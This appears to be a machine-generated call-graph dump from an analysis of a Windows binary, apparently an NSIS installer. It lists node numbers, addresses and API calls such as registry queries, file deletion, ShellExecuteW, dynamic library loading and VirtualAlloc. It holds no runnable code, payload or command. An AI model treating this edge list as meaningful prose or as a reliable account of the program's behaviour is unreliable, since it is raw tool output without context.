4865->4866 4865->4871 4947 40330f SetFilePointer 4866->4947 4868 402fe7 4869 403062 46 API calls 4868->4869 4869->4871 4870->4851 4870->4853 4870->4856 4870->4862 4870->4871 4871->4780 4873 406254 3 API calls 4872->4873 4874 4038c8 4873->4874 4875 4038e0 4874->4875 4876 4038ce 4874->4876 4877 405db7 3 API calls 4875->4877 4958 405e31 wsprintfW 4876->4958 4878 403910 4877->4878 4880 40392f lstrcatW 4878->4880 4882 405db7 3 API calls 4878->4882 4881 4038de 4880->4881 4949 403b8a 4881->4949 4882->4880 4885 405a3d 18 API calls 4886 403961 4885->4886 4887 4039f5 4886->4887 4889 405db7 3 API calls 4886->4889 4888 405a3d 18 API calls 4887->4888 4890 4039fb 4888->4890 4891 403993 4889->4891 4892 403a0b LoadImageW 4890->4892 4893 405f0c 18 API calls 4890->4893 4891->4887 4896 4039b4 lstrlenW 4891->4896 4900 405962 CharNextW 4891->4900 4894 403ab1 4892->4894 4895 403a32 RegisterClassW 4892->4895 4893->4892 4899 40140b 2 API calls 4894->4899 4897 403abb 4895->4897 4898 403a68 SystemParametersInfoW CreateWindowExW 4895->4898 4901 4039c2 lstrcmpiW 4896->4901 4902 4039e8 4896->4902 4897->4783 4898->4894 4903 403ab7 4899->4903 4904 4039b1 4900->4904 4901->4902 4905 4039d2 GetFileAttributesW 4901->4905 4906 405935 3 API calls 4902->4906 4903->4897 4908 403b8a 19 API calls 4903->4908 4904->4896 4907 4039de 4905->4907 4909 4039ee 4906->4909 4907->4902 4910 405981 2 API calls 4907->4910 4911 403ac8 4908->4911 4959 405eea lstrcpynW 4909->4959 4910->4902 4913 403ad4 ShowWindow LoadLibraryW 4911->4913 4914 403b57 4911->4914 4915 403af3 LoadLibraryW 4913->4915 4916 403afa GetClassInfoW 4913->4916 4960 405267 OleInitialize 4914->4960 4915->4916 4918 403b24 DialogBoxParamW 4916->4918 4919 403b0e GetClassInfoW RegisterClassW 4916->4919 4921 40140b 2 API calls 4918->4921 4919->4918 4920 403b5d 4922 403b61 4920->4922 4923 403b79 4920->4923 4921->4897 4922->4897 4925 40140b 2 API calls 4922->4925 4924 40140b 2 API calls 4923->4924 4924->4897 4925->4897 4926->4770 4927->4815 4928->4786 4930 4037d3 CloseHandle 4929->4930 4931 4037dd 4929->4931 4930->4931 4932 4037f1 4931->4932 4933 4037e7 CloseHandle 4931->4933 4968 40381f 4932->4968 4933->4932 4936 405772 71 API calls 4937 403621 OleUninitialize 4936->4937 4937->4792 4937->4793 4938->4807 4939->4829 4941 405b92 GetTickCount GetTempFileNameW 4940->4941 4942 403358 4941->4942 4943 405bc8 4941->4943 4942->4772 4943->4941 4943->4942 4944->4844 4945->4846 4946->4850 4947->4868 4948->4860 4950 403b9e 4949->4950 4967 405e31 wsprintfW 4950->4967 4952 403c0f 4953 405f0c 18 API calls 4952->4953 4954 403c1b SetWindowTextW 4953->4954 4955 40393f 4954->4955 4956 403c37 4954->4956 4955->4885 4956->4955 4957 405f0c 18 API calls 4956->4957 4957->4956 4958->4881 4959->4887 4961 40417b SendMessageW 4960->4961 4962 40528a 4961->4962 4965 401389 2 API calls 4962->4965 4966 4052b1 4962->4966 4963 40417b SendMessageW 4964 4052c3 OleUninitialize 4963->4964 4964->4920 4965->4962 4966->4963 4967->4952 4969 40382d 4968->4969 4970 4037f6 4969->4970 4971 403832 FreeLibrary GlobalFree 4969->4971 4970->4936 4971->4970 4971->4971 5272 40155b 5273 40296d 5272->5273 5276 405e31 wsprintfW 5273->5276 5275 402972 5276->5275 3906 4023e0 3917 402c44 3906->3917 3908 4023ea 3921 402b3a 3908->3921 3911 4023fe RegQueryValueExW 3912 402424 RegCloseKey 3911->3912 3913 40241e 3911->3913 3916 402793 3912->3916 3913->3912 3927 405e31 wsprintfW 3913->3927 3918 402b3a 18 API calls 3917->3918 3919 402c5d 3918->3919 3920 402c6b RegOpenKeyExW 3919->3920 3920->3908 3922 402b46 3921->3922 3928 405f0c 3922->3928 3925 4023f3 3925->3911 3925->3916 3927->3912 3929 405f19 3928->3929 3930 406164 3929->3930 3933 405fcc GetVersion 3929->3933 3934 406132 lstrlenW 3929->3934 3936 405f0c 10 API calls 3929->3936 3939 406047 GetSystemDirectoryW 3929->3939 3940 40605a GetWindowsDirectoryW 3929->3940 3941 40617e 5 API calls 3929->3941 3942 405f0c 10 API calls 3929->3942 3943 4060d3 lstrcatW 3929->3943 3944 40608e SHGetSpecialFolderLocation 3929->3944 3955 405db7 RegOpenKeyExW 3929->3955 3960 405e31 wsprintfW 3929->3960 3961 405eea lstrcpynW 3929->3961 3931 402b67 3930->3931 3962 405eea lstrcpynW 3930->3962 3931->3925 3946 40617e 3931->3946 3933->3929 3934->3929 3936->3934 3939->3929 3940->3929 3941->3929 3942->3929 3943->3929 3944->3929 3945 4060a6 SHGetPathFromIDListW CoTaskMemFree 3944->3945 3945->3929 3948 40618b 3946->3948 3947 406201 3949 406206 CharPrevW 3947->3949 3951 406227 3947->3951 3948->3947 3950 4061f4 CharNextW 3948->3950 3953 4061e0 CharNextW 3948->3953 3954 4061ef CharNextW 3948->3954 3963 405962 3948->3963 3949->3947 3950->3947 3950->3948 3951->3925 3953->3948 3954->3950 3956 405e2b 3955->3956 3957 405deb RegQueryValueExW 3955->3957 3956->3929 3958 405e0c RegCloseKey 3957->3958 3958->3956 3960->3929 3961->3929 3962->3931 3964 405968 3963->3964 3965 40597e 3964->3965 3966 40596f CharNextW 3964->3966 3965->3948 3966->3964 5284 401ce5 GetDlgItem GetClientRect 5285 402b3a 18 API calls 5284->5285 5286 401d17 LoadImageW SendMessageW 5285->5286 5287 401d35 DeleteObject 5286->5287 5288 4029c7 5286->5288 5287->5288 4189 40206a 4190 402b3a 18 API calls 4189->4190 4191 402071 4190->4191 4192 402b3a 18 API calls 4191->4192 4193 40207b 4192->4193 4194 402b3a 18 API calls 4193->4194 4195 402084 4194->4195 4196 402b3a 18 API calls 4195->4196 4197 40208e 4196->4197 4198 402b3a 18 API calls 4197->4198 4199 402098 4198->4199 4200 4020ac CoCreateInstance 4199->4200 4201 402b3a 18 API calls 4199->4201 4204 4020cb 4200->4204 4201->4200 4203 402197 4204->4203 4205 401423 4204->4205 4206 405194 25 API calls 4205->4206 4207 401431 4206->4207 4207->4203 5289 40156b 5290 401584 5289->5290 5291 40157b ShowWindow 5289->5291 5292 401592 ShowWindow 5290->5292 5293 4029c7 5290->5293 5291->5290 5292->5293 5294 4024ee 5295 4024f3 5294->5295 5296 40250c 5294->5296 5297 402b1d 18 API calls 5295->5297 5298 402512 5296->5298 5299 40253e 5296->5299 5302 4024fa 5297->5302 5300 402b3a 18 API calls 5298->5300 5301 402b3a 18 API calls 5299->5301 5303 402519 WideCharToMultiByte lstrlenA 5300->5303 5304 402545 lstrlenW 5301->5304 5305 402567 WriteFile 5302->5305 5306 402793 5302->5306 5303->5302 5304->5302 5305->5306 5307 4018ef 5308 401926 5307->5308 5309 402b3a 18 API calls 5308->5309 5310 40192b 5309->5310 5311 405772 71 API calls 5310->5311 5312 401934 5311->5312 5313 402770 5314 402b3a 18 API calls 5313->5314 5315 402777 FindFirstFileW 5314->5315 5316 40278a 5315->5316 5317 40279f 5315->5317 5318 4027a8 5317->5318 5321 405e31 wsprintfW 5317->5321 5322 405eea lstrcpynW 5318->5322 5321->5318 5322->5316 5323 4014f1 SetForegroundWindow 5324 4029c7 5323->5324 5325 403872 5326 40387d 5325->5326 5327 403881 5326->5327 5328 403884 GlobalAlloc 5326->5328 5328->5327 5329 4018f2 5330 402b3a 18 API calls 5329->5330 5331 4018f9 5330->5331 5332 4056c6 MessageBoxIndirectW 5331->5332 5333 401902 5332->5333 4446 402573 4447 402b1d 18 API calls 4446->4447 4449 402582 4447->4449 4448 4026a0 4449->4448 4450 4025c8 ReadFile 4449->4450 4451 405bd9 ReadFile 4449->4451 4452 4026a2 4449->4452 4453 402608 MultiByteToWideChar 4449->4453 4455 40262e SetFilePointer MultiByteToWideChar 4449->4455 4456 4026b3 4449->4456 4450->4448 4450->4449 4451->4449 4458 405e31 wsprintfW 4452->4458 4453->4449 4455->4449 4456->4448 4457 4026d4 SetFilePointer 4456->4457 4457->4448 4458->4448 5334 401df3 5335 402b3a 18 API calls 5334->5335 5336 401df9 5335->5336 5337 402b3a 18 API calls 5336->5337 5338 401e02 5337->5338 5339 402b3a 18 API calls 5338->5339 5340 401e0b 5339->5340 5341 402b3a 18 API calls 5340->5341 5342 401e14 5341->5342 5343 401423 25 API calls 5342->5343 5344 401e1b ShellExecuteW 5343->5344 5345 401e4c 5344->5345 4731 4026f9 4732 402700 4731->4732 4735 402972 4731->4735 4733 402b1d 18 API calls 4732->4733 4734 40270b 4733->4734 4736 402712 SetFilePointer 4734->4736 4736->4735 4737 402722 4736->4737 4739 405e31 wsprintfW 4737->4739 4739->4735 5372 40427d lstrlenW 5373 40429c 5372->5373 5374 40429e WideCharToMultiByte 5372->5374 5373->5374 5375 1000103d 5376 1000101b 7 API calls 5375->5376 5377 10001056 5376->5377 5378 402c7f 5379 402c91 SetTimer 5378->5379 5380 402caa 5378->5380 5379->5380 5381 402cf8 5380->5381 5382 402cfe MulDiv 5380->5382 5383 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5382->5383 5383->5381 5385 4014ff 5386 401507 5385->5386 5388 40151a 5385->5388 5387 402b1d 18 API calls 5386->5387 5387->5388 5389 401000 5390 401037 BeginPaint GetClientRect 5389->5390 5393 40100c DefWindowProcW 5389->5393 5391 4010f3 5390->5391 5395 401073 CreateBrushIndirect FillRect DeleteObject 5391->5395 5396 4010fc 5391->5396 5394 401179 5393->5394 5395->5391 5397 401102 CreateFontIndirectW 5396->5397 5398 401167 EndPaint 5396->5398 5397->5398 5399 401112 6 API calls 5397->5399 5398->5394 5399->5398 5400 401a00 5401 402b3a 18 API calls 5400->5401 5402 401a09 ExpandEnvironmentStringsW 5401->5402 5403 401a30 5402->5403 5404 401a1d 5402->5404 5404->5403 5405 401a22 lstrcmpW 5404->5405 5405->5403 5406 401b01 5407 402b3a 18 API calls 5406->5407 5408 401b08 5407->5408 5409 402b1d 18 API calls 5408->5409 5410 401b11 wsprintfW 5409->5410 5411 4029c7 5410->5411 5412 100018c1 5413 10001243 3 API calls 5412->5413 5414 100018e7 5413->5414 5415 10001243 3 API calls 5414->5415 5416 100018ef 5415->5416 5417 10001243 3 API calls 5416->5417 5419 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5416->5419 5418 10001916 5417->5418 5420 1000191f GlobalFree 5418->5420 5421 10001280 2 API calls 5419->5421 5420->5419 5422 10001aad GlobalFree GlobalFree 5421->5422 5423 10002a43 5424 10002a5b 5423->5424 5425 100015a7 2 API calls 5424->5425 5426 10002a76 5425->5426 5427 404583 5428 404593 5427->5428 5429 4045b9 5427->5429 5430 40412f 19 API calls 5428->5430 5431 404196 8 API calls 5429->5431 5432 4045a0 SetDlgItemTextW 5430->5432 5433 4045c5 5431->5433 5432->5429 4148 405108 4149 405118 4148->4149 4150 40512c 4148->4150 4151 40511e 4149->4151 4161 405175 4149->4161 4152 405134 IsWindowVisible 4150->4152 4159 405154 4150->4159 4162 40417b 4151->4162 4154 405141 4152->4154 4152->4161 4165 404a5e SendMessageW 4154->4165 4155 40517a CallWindowProcW 4156 405128 4155->4156 4159->4155 4170 404ade 4159->4170 4161->4155 4163 404193 4162->4163 4164 404184 SendMessageW 4162->4164 4163->4156 4164->4163 4166 404a81 GetMessagePos ScreenToClient SendMessageW 4165->4166 4167 404abd SendMessageW 4165->4167 4168 404ab5 4166->4168 4169 404aba 4166->4169 4167->4168 4168->4159 4169->4167 4179 405eea lstrcpynW 4170->4179 4172 404af1 4180 405e31 wsprintfW 4172->4180 4174 404afb 4181 40140b 4174->4181 4178 404b0b 4178->4161 4179->4172 4180->4174 4185 401389 4181->4185 4184 405eea lstrcpynW 4184->4178 4187 401390 4185->4187 4186 4013fe 4186->4184 4187->4186 4188 4013cb MulDiv SendMessageW 4187->4188 4188->4187 5434 401f08 5435 402b3a 18 API calls 5434->5435 5436 401f0f GetFileVersionInfoSizeW 5435->5436 5437 401f36 GlobalAlloc 5436->5437 5438 401f8c 5436->5438 5437->5438 5439 401f4a GetFileVersionInfoW 5437->5439 5439->5438 5440 401f59 VerQueryValueW 5439->5440 5440->5438 5441 401f72 5440->5441 5445 405e31 wsprintfW 5441->5445 5443 401f7e 5446 405e31 wsprintfW 5443->5446 5445->5443 5446->5438 5454 1000224c 5455 100022b1 5454->5455 5456 100022e7 5454->5456 5455->5456 5457 100022c3 GlobalAlloc 5455->5457 5457->5455 5458 100016ce 5459 100016fd 5458->5459 5460 10001b3e 24 API calls 5459->5460 5461 10001704 5460->5461 5462 10001717 5461->5462 5463 1000170b 5461->5463 5465 10001721 5462->5465 5466 1000173e 5462->5466 5464 10001280 2 API calls 5463->5464 5469 10001715 5464->5469 5470 10001555 2 API calls 5465->5470 5467 10001744 5466->5467 5468 10001768 5466->5468 5471 100015cc 2 API calls 5467->5471 5472 10001555 2 API calls 5468->5472 5473 10001726 5470->5473 5475 10001749 5471->5475 5472->5469 5474 100015cc 2 API calls 5473->5474 5476 1000172c 5474->5476 5477 10001280 2 API calls 5475->5477 5478 10001280 2 API calls 5476->5478 5479 1000174f GlobalFree 5477->5479 5480 10001732 GlobalFree 5478->5480 5479->5469 5481 10001763 GlobalFree 5479->5481 5480->5469 5481->5469 4211 404b10 GetDlgItem GetDlgItem 4212 404b62 7 API calls 4211->4212 4221 404d7b 4211->4221 4213 404c05 DeleteObject 4212->4213 4214 404bf8 SendMessageW 4212->4214 4215 404c0e 4213->4215 4214->4213 4216 404c1d 4215->4216 4217 404c45 4215->4217 4219 405f0c 18 API calls 4216->4219 4267 40412f 4217->4267 4218 404f0b 4225 404f15 SendMessageW 4218->4225 4232 404f1d 4218->4232 4226 404c27 SendMessageW SendMessageW 4219->4226 4220 404e40 4224 404e5f 4220->4224 4231 404e51 SendMessageW 4220->4231 4221->4220 4221->4224 4227 404ddb 4221->4227 4223 4050f3 4280 404196 4223->4280 4224->4218 4224->4223 4229 404eb8 SendMessageW 4224->4229 4225->4232 4226->4215 4233 404a5e 5 API calls 4227->4233 4228 404c59 4234 40412f 19 API calls 4228->4234 4229->4223 4236 404ecd SendMessageW 4229->4236 4231->4224 4238 404f36 4232->4238 4239 404f2f ImageList_Destroy 4232->4239 4243 404f46 4232->4243 4246 404dec 4233->4246 4247 404c67 4234->4247 4235 4050b5 4235->4223 4244 4050c7 ShowWindow GetDlgItem ShowWindow 4235->4244 4241 404ee0 4236->4241 4242 404f3f GlobalFree 4238->4242 4238->4243 4239->4238 4240 404d3c GetWindowLongW SetWindowLongW 4245 404d55 4240->4245 4252 404ef1 SendMessageW 4241->4252 4242->4243 4243->4235 4257 404ade 4 API calls 4243->4257 4261 404f81 4243->4261 4244->4223 4248 404d73 4245->4248 4249 404d5b ShowWindow 4245->4249 4246->4220 4247->4240 4251 404cb7 SendMessageW 4247->4251 4253 404d36 4247->4253 4255 404cf3 SendMessageW 4247->4255 4256 404d04 SendMessageW 4247->4256 4271 404164 SendMessageW 4248->4271 4270 404164 SendMessageW 4249->4270 4251->4247 4252->4218 4253->4240 4253->4245 4255->4247 4256->4247 4257->4261 4258 404d6e 4258->4223 4259 40508b InvalidateRect 4259->4235 4260 4050a1 4259->4260 4272 404978 4260->4272 4262 404faf SendMessageW 4261->4262 4263 404fc5 4261->4263 4262->4263 4263->4259 4265 405026 4263->4265 4266 405039 SendMessageW SendMessageW 4263->4266 4265->4266 4266->4263 4268 405f0c 18 API calls 4267->4268 4269 40413a SetDlgItemTextW 4268->4269 4269->4228 4270->4258 4271->4221 4273 404995 4272->4273 4274 405f0c 18 API calls 4273->4274 4275 4049ca 4274->4275 4276 405f0c 18 API calls 4275->4276 4277 4049d5 4276->4277 4278 405f0c 18 API calls 4277->4278 4279 404a06 lstrlenW wsprintfW SetDlgItemTextW 4278->4279 4279->4235 4281 404237 4280->4281 4282 4041ae GetWindowLongW 4280->4282 4282->4281 4283 4041bf 4282->4283 4284 4041d1 4283->4284 4285 4041ce GetSysColor 4283->4285 4286 4041e1 SetBkMode 4284->4286 4287 4041d7 SetTextColor 4284->4287 4285->4284 4288 4041f9 GetSysColor 4286->4288 4289 4041ff 4286->4289 4287->4286 4288->4289 4290 404210 4289->4290 4291 404206 SetBkColor 4289->4291 4290->4281 4292 404223 DeleteObject 4290->4292 4293 40422a CreateBrushIndirect 4290->4293 4291->4290 4292->4293 4293->4281 5482 401491 5483 405194 25 API calls 5482->5483 5484 401498 5483->5484 5485 404912 5486 404922 5485->5486 5487 40493e 5485->5487 5496 4056aa GetDlgItemTextW 5486->5496 5489 404971 5487->5489 5490 404944 SHGetPathFromIDListW 5487->5490 5492 40495b SendMessageW 5490->5492 5493 404954 5490->5493 5491 40492f SendMessageW 5491->5487 5492->5489 5494 40140b 2 API calls 5493->5494 5494->5492 5496->5491 5497 402295 5498 402b3a 18 API calls 5497->5498 5499 4022a4 5498->5499 5500 402b3a 18 API calls 5499->5500 5501 4022ad 5500->5501 5502 402b3a 18 API calls 5501->5502 5503 4022b7 GetPrivateProfileStringW 5502->5503 4536 401718 4537 402b3a 18 API calls 4536->4537 4538 40171f SearchPathW 4537->4538 4539 40173a 4538->4539 4540 401f98 4541 40205c 4540->4541 4542 401faa 4540->4542 4545 401423 25 API calls 4541->4545 4543 402b3a 18 API calls 4542->4543 4544 401fb1 4543->4544 4546 402b3a 18 API calls 4544->4546 4547 402197 4545->4547 4548 401fba 4546->4548 4549 401fd0 LoadLibraryExW 4548->4549 4550 401fc2 GetModuleHandleW 4548->4550 4549->4541 4551 401fe1 4549->4551 4550->4549 4550->4551 4563 4062c0 WideCharToMultiByte 4551->4563 4554 401ff2 4556 402011 4554->4556 4557 401ffa 4554->4557 4555 40202b 4558 405194 25 API calls 4555->4558 4566 10001771 4556->4566 4559 401423 25 API calls 4557->4559 4560 402002 4558->4560 4559->4560 4560->4547 4561 40204e FreeLibrary 4560->4561 4561->4547 4564 4062ea GetProcAddress 4563->4564 4565 401fec 4563->4565 4564->4565 4565->4554 4565->4555 4567 100017a1 4566->4567 4608 10001b3e 4567->4608 4569 100017a8 4570 100018be 4569->4570 4571 100017c0 4569->4571 4572 100017b9 4569->4572 4570->4560 4642 100022eb 4571->4642 4660 100022a1 4572->4660 4577 10001824 4581 10001866 4577->4581 4582 1000182a 4577->4582 4578 10001806 4673 1000248d 4578->4673 4579 100017d6 4584 100017dc 4579->4584 4589 100017e7 4579->4589 4580 100017ef 4593 100017e5 4580->4593 4670 10002b23 4580->4670 4587 1000248d 9 API calls 4581->4587 4585 100015cc 2 API calls 4582->4585 4584->4593 4654 10002868 4584->4654 4592 10001840 4585->4592 4594 10001858 4587->4594 4664 1000260b 4589->4664 4597 1000248d 9 API calls 4592->4597 4593->4577 4593->4578 4599 100018ad 4594->4599 4692 10002450 4594->4692 4596 100017ed 4596->4593 4597->4594 4599->4570 4601 100018b7 GlobalFree 4599->4601 4601->4570 4605 10001899 4605->4599 4696 10001555 4605->4696 4607 10001892 FreeLibrary 4607->4605 4700 1000121b GlobalAlloc 4608->4700 4610 10001b62 4701 1000121b GlobalAlloc 4610->4701 4612 10001b6d 4702 10001243 4612->4702 4614 10001da0 GlobalFree GlobalFree GlobalFree 4615 10001dbd 4614->4615 4629 10001e07 4614->4629 4617 1000210d 4615->4617 4623 10001dd2 4615->4623 4615->4629 4616 10001c43 GlobalAlloc 4639 10001b75 4616->4639 4618 1000212f GetModuleHandleW 4617->4618 4617->4629 4621 10002140 LoadLibraryW 4618->4621 4622 10002155 4618->4622 4619 10001c8e lstrcpyW 4624 10001c98 lstrcpyW 4619->4624 4620 10001cac GlobalFree 4620->4639 4621->4622 4621->4629 4713 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4622->4713 4623->4629 4709 1000122c 4623->4709 4624->4639 4626 100021a7 4627 100021b4 lstrlenW 4626->4627 4626->4629 4714 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4627->4714 4629->4569 4630 10002167 4630->4626 4641 10002191 GetProcAddress 4630->4641 4632 10002067 4632->4629 4637 100020af lstrcpyW 4632->4637 4634 10001cea 4634->4639 4707 100015a7 GlobalSize GlobalAlloc 4634->4707 4635 10001f56 GlobalFree 4635->4639 4636 100021ce 4636->4629 4637->4629 4639->4614 4639->4616 4639->4619 4639->4620 4639->4624 4639->4629 4639->4632 4639->4634 4639->4635 4640 1000122c 2 API calls 4639->4640 4712 1000121b GlobalAlloc 4639->4712 4640->4639 4641->4626 4649 10002303 4642->4649 4643 1000122c GlobalAlloc lstrcpynW 4643->4649 4644 10001243 3 API calls 4644->4649 4646 10002419 GlobalFree 4647 100017c6 4646->4647 4646->4649 4647->4579 4647->4580 4647->4593 4648 100023d5 GlobalAlloc WideCharToMultiByte 4648->4646 4649->4643 4649->4644 4649->4646 4649->4648 4650 100023ae GlobalAlloc CLSIDFromString 4649->4650 4651 10002390 lstrlenW 4649->4651 4717 100012c8 4649->4717 4650->4646 4651->4646 4653 1000239b 4651->4653 4653->4646 4722 1000259f 4653->4722 4656 1000287a 4654->4656 4655 1000291f EnumWindows 4657 1000293d 4655->4657 4656->4655 4658 10002a39 4657->4658 4659 10002a2e GetLastError 4657->4659 4658->4593 4659->4658 4661 100022b1 4660->4661 4663 100017bf 4660->4663 4662 100022c3 GlobalAlloc 4661->4662 4661->4663 4662->4661 4663->4571 4668 10002627 4664->4668 4665 10002678 GlobalAlloc 4669 1000269a 4665->4669 4666 1000268b 4667 10002690 GlobalSize 4666->4667 4666->4669 4667->4669 4668->4665 4668->4666 4669->4596 4671 10002b2e 4670->4671 4672 10002b6e GlobalFree 4671->4672 4676 100024ad 4673->4676 4675 10002581 GlobalFree 4675->4676 4679 1000180c 4675->4679 4676->4675 4677 1000250e MultiByteToWideChar 4676->4677 4678 10002558 GlobalFree 4676->4678 4680 100024fd lstrcpynW 4676->4680 4681 100024ec StringFromGUID2 4676->4681 4682 10001280 2 API calls 4676->4682 4725 1000121b GlobalAlloc 4676->4725 4726 100012f3 4676->4726 4677->4676 4678->4676 4684 100015cc 4679->4684 4680->4676 4681->4676 4682->4676 4730 1000121b GlobalAlloc 4684->4730 4686 100015d2 4687 100015e4 lstrcpyW 4686->4687 4688 100015f9 4686->4688 4687->4688 4689 10001280 4688->4689 4690 100012c3 GlobalFree 4689->4690 4691 10001289 GlobalAlloc lstrcpynW 4689->4691 4690->4594 4691->4690 4693 1000245e 4692->4693 4695 10001879 4692->4695 4694 1000247a GlobalFree 4693->4694 4693->4695 4694->4693 4695->4605 4695->4607 4697 1000156d 4696->4697 4698 10001280 2 API calls 4697->4698 4699 10001576 4698->4699 4699->4599 4700->4610 4701->4612 4703 1000127c 4702->4703 4704 1000124d 4702->4704 4703->4639 4704->4703 4715 1000121b GlobalAlloc 4704->4715 4706 10001259 lstrcpyW GlobalFree 4706->4639 4708 100015c5 4707->4708 4708->4634 4716 1000121b GlobalAlloc 4709->4716 4711 1000123b lstrcpynW 4711->4629 4712->4639 4713->4630 4714->4636 4715->4706 4716->4711 4718 100012ee 4717->4718 4719 100012d0 4717->4719 4718->4718 4719->4718 4720 1000122c 2 API calls 4719->4720 4721 100012ec 4720->4721 4721->4649 4723 10002603 4722->4723 4724 100025ad VirtualAlloc 4722->4724 4723->4653 4724->4723 4725->4676 4727 10001324 4726->4727 4728 100012fc 4726->4728 4727->4676 4728->4727 4729 10001308 lstrcpyW 4728->4729 4729->4727 4730->4686 5504 10001058 5505 10001243 3 API calls 5504->5505 5507 10001074 5505->5507 5506 100010dd 5507->5506 5508 1000152e 4 API calls 5507->5508 5509 10001092 5507->5509 5508->5509 5510 1000152e 4 API calls 5509->5510 5511 100010a2 5510->5511 5512 100010b2 5511->5512 5513 100010a9 GlobalSize 5511->5513 5514 100010b6 GlobalAlloc 5512->5514 5515 100010c7 5512->5515 5513->5512 5516 10001555 2 API calls 5514->5516 5517 100010d2 GlobalFree 5515->5517 5516->5515 5517->5506 5518 40159b 5519 402b3a 18 API calls 5518->5519 5520 4015a2 SetFileAttributesW 5519->5520 5521 4015b4 5520->5521 5522 40149e 5523 4014ac PostQuitMessage 5522->5523 5524 40223e 5522->5524 5523->5524 5525 4021a0 5526 402b3a 18 API calls 5525->5526 5527 4021a6 5526->5527 5528 402b3a 18 API calls 5527->5528 5529 4021af 5528->5529 5530 402b3a 18 API calls 5529->5530 5531 4021b8 5530->5531 5532 40622d 2 API calls 5531->5532 5533 4021c1 5532->5533 5534 4021d2 lstrlenW lstrlenW 5533->5534 5535 4021c5 5533->5535 5537 405194 25 API calls 5534->5537 5536 405194 25 API calls 5535->5536 5539 4021cd 5535->5539 5536->5539 5538 402210 SHFileOperationW 5537->5538 5538->5535 5538->5539 5540 100010e1 5541 10001111 5540->5541 5542 10001243 3 API calls 5541->5542 5552 10001121 5542->5552 5543 100011d8 GlobalFree 5544 100012c8 2 API calls 5544->5552 5545 100011d3 5545->5543 5546 10001243 3 API calls 5546->5552 5547 10001280 2 API calls 5550 100011c4 GlobalFree 5547->5550 5548 10001164 GlobalAlloc 5548->5552 5549 100011f8 GlobalFree 5549->5552 5550->5552 5551 100012f3 lstrcpyW 5551->5552 5552->5543 5552->5544 5552->5545 5552->5546 5552->5547 5552->5548 5552->5549 5552->5550 5552->5551 3967 401b22 3968 401b73 3967->3968 3969 401b2f 3967->3969 3971 401b78 3968->3971 3972 401b9d GlobalAlloc 3968->3972 3970 401bb8 3969->3970 3975 401b46 3969->3975 3974 405f0c 18 API calls 3970->3974 3983 40223e 3970->3983 3971->3983 3988 405eea lstrcpynW 3971->3988 3973 405f0c 18 API calls 3972->3973 3973->3970 3976 402238 3974->3976 3986 405eea lstrcpynW 3975->3986 3989 4056c6 3976->3989 3979 401b8a GlobalFree 3979->3983 3980 401b55 3987 405eea lstrcpynW 3980->3987 3984 401b64 3993 405eea lstrcpynW 3984->3993 3986->3980 3987->3984 3988->3979 3990 4056db 3989->3990 3991 405727 3990->3991 3992 4056ef MessageBoxIndirectW 3990->3992 3991->3983 3992->3991 3993->3983 5553 4029a2 SendMessageW 5554 4029c7 5553->5554 5555 4029bc InvalidateRect 5553->5555 5555->5554 3994 401924 3995 401926 3994->3995 3996 402b3a 18 API calls 3995->3996 3997 40192b 3996->3997 4000 405772 3997->4000 4039 405a3d 4000->4039 4003 4057b1 4010 4058d1 4003->4010 4053 405eea lstrcpynW 4003->4053 4004 40579a DeleteFileW 4005 401934 4004->4005 4007 4057d7 4008 4057ea 4007->4008 4009 4057dd lstrcatW 4007->4009 4054 405981 lstrlenW 4008->4054 4011 4057f0 4009->4011 4010->4005 4083 40622d FindFirstFileW 4010->4083 4015 405800 lstrcatW 4011->4015 4017 40580b lstrlenW FindFirstFileW 4011->4017 4015->4017 4016 4058fa 4086 405935 lstrlenW CharPrevW 4016->4086 4017->4010 4024 40582d 4017->4024 4020 4058b4 FindNextFileW 4020->4024 4025 4058ca FindClose 4020->4025 4021 40572a 5 API calls 4023 40590c 4021->4023 4026 405910 4023->4026 4027 405926 4023->4027 4024->4020 4035 405875 4024->4035 4058 405eea lstrcpynW 4024->4058 4025->4010 4026->4005 4030 405194 25 API calls 4026->4030 4029 405194 25 API calls 4027->4029 4029->4005 4032 40591d 4030->4032 4031 405772 64 API calls 4031->4035 4034 405d84 40 API calls 4032->4034 4033 405194 25 API calls 4033->4020 4037 405924 4034->4037 4035->4020 4035->4031 4035->4033 4059 40572a 4035->4059 4067 405194 4035->4067 4078 405d84 4035->4078 4037->4005 4089 405eea lstrcpynW 4039->4089 4041 405a4e 4090 4059e0 CharNextW CharNextW 4041->4090 4044 405792 4044->4003 4044->4004 4045 40617e 5 API calls 4051 405a64 4045->4051 4046 405a95 lstrlenW 4047 405aa0 4046->4047 4046->4051 4049 405935 3 API calls 4047->4049 4048 40622d 2 API calls 4048->4051 4050 405aa5 GetFileAttributesW 4049->4050 4050->4044 4051->4044 4051->4046 4051->4048 4052 405981 2 API calls 4051->4052 4052->4046 4053->4007 4055 40598f 4054->4055 4056 4059a1 4055->4056 4057 405995 CharPrevW 4055->4057 4056->4011 4057->4055 4057->4056 4058->4024 4096 405b31 GetFileAttributesW 4059->4096 4062 405745 RemoveDirectoryW 4064 405753 4062->4064 4063 40574d DeleteFileW 4063->4064 4065 405757 4064->4065 4066 405763 SetFileAttributesW 4064->4066 4065->4035 4066->4065 4068 405251 4067->4068 4069 4051af 4067->4069 4068->4035 4070 4051cb lstrlenW 4069->4070 4071 405f0c 18 API calls 4069->4071 4072 4051f4 4070->4072 4073 4051d9 lstrlenW 4070->4073 4071->4070 4074 405207 4072->4074 4075 4051fa SetWindowTextW 4072->4075 4073->4068 4076 4051eb lstrcatW 4073->4076 4074->4068 4077 40520d SendMessageW SendMessageW SendMessageW 4074->4077 4075->4074 4076->4072 4077->4068 4099 406254 GetModuleHandleA 4078->4099 4082 405dac 4082->4035 4084 406243 FindClose 4083->4084 4085 4058f6 4083->4085 4084->4085 4085->4005 4085->4016 4087 405951 lstrcatW 4086->4087 4088 405900 4086->4088 4087->4088 4088->4021 4089->4041 4091 4059fd 4090->4091 4094 405a0f 4090->4094 4093 405a0a CharNextW 4091->4093 4091->4094 4092 405a33 4092->4044 4092->4045 4093->4092 4094->4092 4095 405962 CharNextW 4094->4095 4095->4094 4097 405736 4096->4097 4098 405b43 SetFileAttributesW 4096->4098 4097->4062 4097->4063 4097->4065 4098->4097 4100 406270 LoadLibraryA 4099->4100 4101 40627b GetProcAddress 4099->4101 4100->4101 4102 405d8b 4100->4102 4101->4102 4102->4082 